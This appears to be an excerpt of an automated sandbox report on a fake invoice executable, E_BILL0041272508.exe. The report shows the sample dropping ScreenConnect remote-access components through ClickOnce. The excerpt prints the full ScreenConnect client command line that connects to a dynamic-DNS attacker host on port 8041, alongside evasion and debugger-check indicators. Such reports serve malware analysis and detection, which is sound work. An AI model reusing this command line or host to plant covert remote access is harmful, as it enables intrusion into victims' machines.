                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeMemory allocated: 1F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeMemory allocated: 3F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeMemory allocated: 7F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeMemory allocated: 1A240000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3706Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 596Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 4989Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeWindow / User API: threadDelayed 353Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exe TID: 4364Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1828Thread sleep time: -185300s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1828Thread sleep time: -249450s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6488Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 1780Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 1780Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe TID: 4620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 6480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 5764Thread sleep count: 353 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe TID: 2404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe TID: 2664Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B4A4B FindFirstFileExA,0_2_009B4A4B
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: svchost.exe, 00000004.00000002.3766714883.0000027452C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZN
                  Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE618E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3767119759.0000027458257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.2442152731.00000000012D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkh
                  Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCBFF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B191F
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009B1000
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B3677 mov eax, dword ptr fs:[00000030h]0_2_009B3677
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B6893 GetProcessHeap,0_2_009B6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009B1493
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B191F
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B4573
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1AAC SetUnhandledExceptionFilter,0_2_009B1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.ClientService.dll.2.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n5rwkl9c.2ma\oapvkwjd.wrw\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n5rwkl9c.2ma\oapvkwjd.wrw\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\n5rwkl9c.2ma\oapvkwjd.wrw\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\screenconnect.clientservice.exe" "?e=support&y=guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1BD4 cpuid 0_2_009B1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
